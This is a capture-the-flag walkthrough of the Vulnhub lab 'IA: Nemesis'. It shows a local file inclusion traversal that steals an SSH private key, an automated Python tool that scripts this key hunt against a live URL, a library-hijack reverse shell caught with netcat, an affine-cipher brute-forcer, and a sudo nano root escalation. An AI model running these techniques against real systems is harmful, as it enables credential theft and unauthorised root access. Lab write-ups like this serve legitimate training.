**IA: Nemesis (1.0.1)**

Alperen Ugurlu
5 min read · Jan 1, 2021

*Vulnhub Walkthrough*

#alperenugurlu

First of all, we find the IP address of the target machine.

root@kali:~# nmap 10.0.2.0/24 or netdiscover -r 10.0.2.0/24

Either of these reveals the target's IP address (10.0.2.41 in this lab).

The next step is nmap service and version detection.

What catches my attention here are ports 80 and 52846.

An http service is running on port 80, so there is a website. An SSH server has been left open on the non-standard port 52846; we will probably make our connection through it once we have credentials. Our attack map is gradually taking shape. =)

Our next step is to hunt for hidden directories with dirb.

I scanned with dirb and found that access to every useful file was restricted. I then scanned with nikto and gobuster as well, without any useful result.

When the roads are blocked, it is time to tamper with the website. =)

I tried browsing to 10.0.2.41:52845. Remember, ‘nginx’ was running there in the ‘nmap’ scan. I thought I could get something here.

While poking around the site,
I saw that there is a message form on the ‘Contact’ tab. When I see this kind of input, LFI or directory traversal vulnerabilities are the first thing that comes to mind. I tested it for LFI, and the result is what I wanted!

From my own research and from the CTFs I have solved before, I know that a user's OpenSSH private key, ‘id_rsa’, often sits readable in their ‘.ssh’ directory. So that is what I go after with the LFI vulnerability:

exploit: ../../../../home/thanos/.ssh/id_rsa

and I got what I wanted =)
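As an added example (not code from the original write-up), here is how the traversal step can be driven programmatically: the helper walks increasing `../` depths in front of the target path, stops at the first response that contains a PEM private key, cuts the key out of the surrounding HTML, and writes it with owner-only permissions so ssh will accept it. The include root `/var/www/html/pages`, the fake server and the placeholder key are constructed for the offline demo; the real request parameter name of the Contact form is not given in the write-up, so `make_http_fetch` takes it as an argument (an assumption you fill in from the captured request).

```python
import os
import posixpath
import urllib.parse
import urllib.request
from typing import Callable, Optional, Tuple

# Markers that identify a leaked SSH private key in a response body.
KEY_MARKERS = ("-----BEGIN OPENSSH PRIVATE KEY-----",
               "-----BEGIN RSA PRIVATE KEY-----")


def traversal_payloads(target: str, max_depth: int = 8):
    """Yield '../' prefixes of increasing depth in front of an absolute path.

    The depth that works tells you how far below '/' the include root is
    (four '../' on this box means the script lives four directories down).
    """
    relative = target.lstrip("/")
    for depth in range(1, max_depth + 1):
        yield "../" * depth + relative


def extract_key(body: str) -> str:
    """Cut the PEM block out of a page that wraps it in HTML."""
    lines = [line.strip() for line in body.splitlines()]
    start = next(i for i, line in enumerate(lines)
                 if line.startswith("-----BEGIN") and "PRIVATE KEY" in line)
    end = next(i for i in range(start, len(lines))
               if lines[i].startswith("-----END"))
    return "\n".join(lines[start:end + 1]) + "\n"


def find_private_key(fetch: Callable[[str], str],
                     target: str = "/home/thanos/.ssh/id_rsa",
                     max_depth: int = 8) -> Optional[Tuple[str, str]]:
    """Try traversal depths until a response contains a private key.

    Returns (payload_that_worked, key_text), or None if nothing leaked.
    """
    for payload in traversal_payloads(target, max_depth):
        body = fetch(payload)
        if any(marker in body for marker in KEY_MARKERS):
            return payload, extract_key(body)
    return None


def save_key(key: str, path: str) -> None:
    """Write the key with mode 0600; ssh refuses keys readable by others."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(key)


def make_http_fetch(url: str, param: str) -> Callable[[str], str]:
    """Real fetcher: GET url?param=<payload>.  'param' is the vulnerable
    query parameter you identified in the request (assumed, not from the page)."""
    def fetch(payload: str) -> str:
        query = urllib.parse.urlencode({param: payload})
        with urllib.request.urlopen(f"{url}?{query}", timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return fetch


# --- Constructed stand-in for the vulnerable page so the demo runs offline ---
SAMPLE_KEY = (  # constructed placeholder, not a real key
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "b3BlbnNzaC1rZXktdjEAAAAA(constructed-placeholder-not-a-real-key)\n"
    "-----END OPENSSH PRIVATE KEY-----\n"
)


class FakeVulnerableServer:
    """Includes whatever path it is handed, resolved relative to the
    directory of the script (assumed here to be /var/www/html/pages)."""
    INCLUDE_ROOT = "/var/www/html/pages"
    FILES = {
        "/home/thanos/.ssh/id_rsa": SAMPLE_KEY,
        "/etc/hostname": "nemesis\n",
    }

    def fetch(self, payload: str) -> str:
        resolved = posixpath.normpath(posixpath.join(self.INCLUDE_ROOT, payload))
        content = self.FILES.get(resolved)
        if content is None:
            return "<html><body>Thanks for your message</body></html>"
        return f"<html><body><pre>\n{content}</pre></body></html>"


if __name__ == "__main__":
    hit = find_private_key(FakeVulnerableServer().fetch)
    print(hit[0] if hit else "no key found")
```

Against the real box you would swap the fake for `make_http_fetch("http://10.0.2.41/<contact page>", "<parameter>")` and pass the returned key to `save_key(key, "id_rsa")` before running ssh.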

Let's go =)

root@kali:~# nano id_rsa

Paste the key into the file and save it. ssh refuses a private key that other users can read, so restrict the file's permissions to the owner before using it. Now we have everything for an SSH connection. Let's connect!

root@kali:~# ssh -i id_rsa thanos@10.0.2.41 -p 52846

Finally we got inside =)

We run ‘ls -la’ to see where we can go.
With ‘cat flag1.txt’ we get our first flag. =)

Friends, now we come to the real trouble =)

In this section we focus on privilege escalation and the material we can use for it on this box.

There is a Python file, ‘backup.py’, next to the flag. When I tried to run it, Python gave an error about the ‘zipfile’ module it imports.

I spent about an hour and a half on this problem. =) In the end I found code on the internet that I could catch with an ‘nc’ (netcat) listener. The instructions were to save it as ‘zipfile.py’ next to backup.py and run it: Python searches the script's own directory before the standard library, so backup.py imports our file instead of the real zipfile module.

Now we check the Python file we wrote with ‘cat’, and start listening with ‘nc’.

root@kali:~# nc -nvlp 4444

We have a remote connection again. We list the files with ‘ls -la’; yes, our second flag is here. We get it with ‘cat flag2.txt’!

We still are not ‘root’, and we have no information about ‘root’.

There is a ‘root.txt’ file in the directory we are in. I read it right away with ‘cat root.txt’.

It points to ‘encrypt.py’ for information about the encryption algorithm. With ‘cat encrypt.py’ we read the file and find that an ‘affine_encrypt’ function is used; next to it is the encrypted password.

I searched Google for ‘affine decrypt’ and found a site for it. I pasted the encrypted password, and it decrypted. The result was the password for ‘carlos’.
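You do not need a website for this step. An affine cipher maps each letter x to y = (a·x + b) mod 26 and needs gcd(a, 26) = 1, which leaves only 12 possible values of a and therefore 312 keys in total, so the whole key space can be tried in a blink. The block below is an added example, not code from the write-up or from the box (encrypt.py and the ciphertext are not reproduced on the page, so it assumes the textbook affine cipher over the 26 lowercase letters matches the box's `affine_encrypt`); the sample plaintext and key are constructed, and the tiny word list and letter frequencies are only used to rank the 312 candidates.

```python
from math import gcd
import string

ALPHABET = string.ascii_lowercase
M = len(ALPHABET)  # 26


def affine_encrypt(plaintext: str, a: int, b: int) -> str:
    """y = (a*x + b) mod 26 on letters; other characters pass through."""
    if gcd(a, M) != 1:
        raise ValueError(f"a={a} has no inverse mod {M}")
    out = []
    for ch in plaintext:
        if ch.isalpha():
            x = ALPHABET.index(ch.lower())
            y = (a * x + b) % M
            out.append(ALPHABET[y].upper() if ch.isupper() else ALPHABET[y])
        else:
            out.append(ch)
    return "".join(out)


def affine_decrypt(ciphertext: str, a: int, b: int) -> str:
    """x = a^-1 * (y - b) mod 26, the inverse of affine_encrypt."""
    a_inv = pow(a, -1, M)  # modular inverse; ValueError if gcd(a, 26) != 1
    out = []
    for ch in ciphertext:
        if ch.isalpha():
            y = ALPHABET.index(ch.lower())
            x = (a_inv * (y - b)) % M
            out.append(ALPHABET[x].upper() if ch.isupper() else ALPHABET[x])
        else:
            out.append(ch)
    return "".join(out)


def all_keys():
    """Every valid (a, b): 12 units mod 26 times 26 shifts = 312 keys."""
    return [(a, b) for a in range(1, M) if gcd(a, M) == 1 for b in range(M)]


# English letter frequencies (percent) and a few common words, used only to
# rank candidate decryptions so the real plaintext floats to the top.
LETTER_FREQ = {
    "a": 8.2, "b": 1.5, "c": 2.8, "d": 4.3, "e": 12.7, "f": 2.2, "g": 2.0,
    "h": 6.1, "i": 7.0, "j": 0.15, "k": 0.77, "l": 4.0, "m": 2.4, "n": 6.7,
    "o": 7.5, "p": 1.9, "q": 0.095, "r": 6.0, "s": 6.3, "t": 9.1, "u": 2.8,
    "v": 0.98, "w": 2.4, "x": 0.15, "y": 2.0, "z": 0.074,
}
COMMON_WORDS = {"the", "and", "for", "is", "in", "of", "to", "a", "it", "on",
                "at", "by", "with", "this", "that", "password", "user", "root",
                "flag", "key"}


def english_score(text: str) -> float:
    """Higher is more English-like: dictionary hits dominate, letters tie-break."""
    words = [w.strip(".,!?") for w in text.lower().split()]
    word_hits = sum(1 for w in words if w in COMMON_WORDS)
    freq = sum(LETTER_FREQ.get(c, 0.0) for c in text.lower())
    return word_hits * 100.0 + freq


def brute_force(ciphertext: str):
    """Decrypt under all 312 keys; return (score, a, b, plaintext), best first."""
    ranked = []
    for a, b in all_keys():
        candidate = affine_decrypt(ciphertext, a, b)
        ranked.append((english_score(candidate), a, b, candidate))
    ranked.sort(reverse=True)
    return ranked


# Constructed sample (not the box's real password or key).
SAMPLE_PLAINTEXT = "the password for carlos is hidden in the notes of a titan"
SAMPLE_KEY = (5, 8)

if __name__ == "__main__":
    ct = affine_encrypt(SAMPLE_PLAINTEXT, *SAMPLE_KEY)
    print("ciphertext:", ct)
    for score, a, b, pt in brute_force(ct)[:3]:
        print(f"a={a:2d} b={b:2d} score={score:6.1f}  {pt}")
```

If encrypt.py on the box also prints or hard-codes its key, `affine_decrypt` with that key is all you need; `brute_force` is for the case where only the ciphertext is known.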

Now we go back to the terminal where we are connected over ssh. We switch user with ‘su carlos’ and enter the password we found. Then I look for a way to escalate with ‘sudo -l’, and I see that ‘/bin/nano …’ may be run as root.

There is a site I use constantly for this kind of problem: https://gtfobins.github.io/
A search for ‘nano’ there gives me what I want; the relevant entry is the sudo one, since the binary is allowed through sudo rather than being SUID.

We are now approaching the end. =)

sudo nano
^R^X
reset; sh 1>&0 2>&0

In nano, ^R opens the Read File prompt and ^X inside it switches to Execute Command, so the shell is spawned by the nano process that sudo started as root. With this we have escalated our privileges.
We got our last flag with ‘cat root.txt’. We won! =)

Written by Alperen Ugurlu

Ethical Hacker | Offensive Hacker | Penetration Test Specialist